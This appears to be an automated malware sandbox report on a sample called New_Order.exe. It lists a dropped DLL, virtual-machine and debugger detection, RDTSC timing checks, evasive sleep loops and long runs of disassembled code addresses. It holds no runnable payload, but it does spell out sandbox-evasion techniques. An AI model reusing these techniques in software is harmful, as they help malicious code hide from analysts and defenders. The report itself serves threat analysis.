Source: C:\Users\user\Desktop\New_Order.exe

File created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\New_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\New_Order.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 5048	Thread sleep time: -45000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6240	Thread sleep time: -44000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,		0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004058BF

Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00409B20 LdrLoadDll,

1_2_00409B20

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]	0_2_10001000
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h]	0_2_024D1790
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h]	0_2_024D19A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952397 mov eax, dword ptr fs:[00000030h]	1_2_03952397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h]	1_2_0395B390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E138A mov eax, dword ptr fs:[00000030h]	1_2_039E138A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]	1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]	1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h]	1_2_039DD380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h]	1_2_039F5BA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]	1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]	1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0394DBE9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E131B mov eax, dword ptr fs:[00000030h]	1_2_039E131B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h]	1_2_039F8B58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h]	1_2_0392F358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h]	1_2_0392DB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]	1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]	1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0392DB60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]	1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]	1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0395FAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h]	1_2_03952ACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h]	1_2_03952AE4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]	1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]	1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h]	1_2_03943A1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]	1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]	1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h]	1_2_03938A0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]	1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]	1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h]	1_2_039EEA55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h]	1_2_039B4257
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396927A mov eax, dword ptr fs:[00000030h]	1_2_0396927A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]	1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]	1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h]	1_2_039F8A62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952990 mov eax, dword ptr fs:[00000030h]	1_2_03952990
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h]	1_2_0395A185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h]	1_2_0394C182
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]	1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]	1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h]	1_2_039A69A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h]	1_2_039B41E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]	1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]	1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]	1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]	1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]	1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]	1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h]	1_2_0392C962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929080 mov eax, dword ptr fs:[00000030h]	1_2_03929080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]	1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]	1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039690AF mov eax, dword ptr fs:[00000030h]	1_2_039690AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039258EC mov eax, dword ptr fs:[00000030h]	1_2_039258EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]	1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]	1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]	1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]	1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h]	1_2_039F1074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h]	1_2_039E2073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938794 mov eax, dword ptr fs:[00000030h]	1_2_03938794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h]	1_2_039637F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h]	1_2_0394F716
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]	1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]	1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]	1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]	1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]	1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]	1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h]	1_2_0395E730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]	1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]	1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h]	1_2_0393EF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h]	1_2_0393FF60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h]	1_2_039F8F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h]	1_2_039BFE87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h]	1_2_039A46A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h]	1_2_039F8ED6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h]	1_2_03968EC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039536CC mov eax, dword ptr fs:[00000030h]	1_2_039536CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h]	1_2_039DFEC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h]	1_2_039376E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h]	1_2_039516E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]	1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]	1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
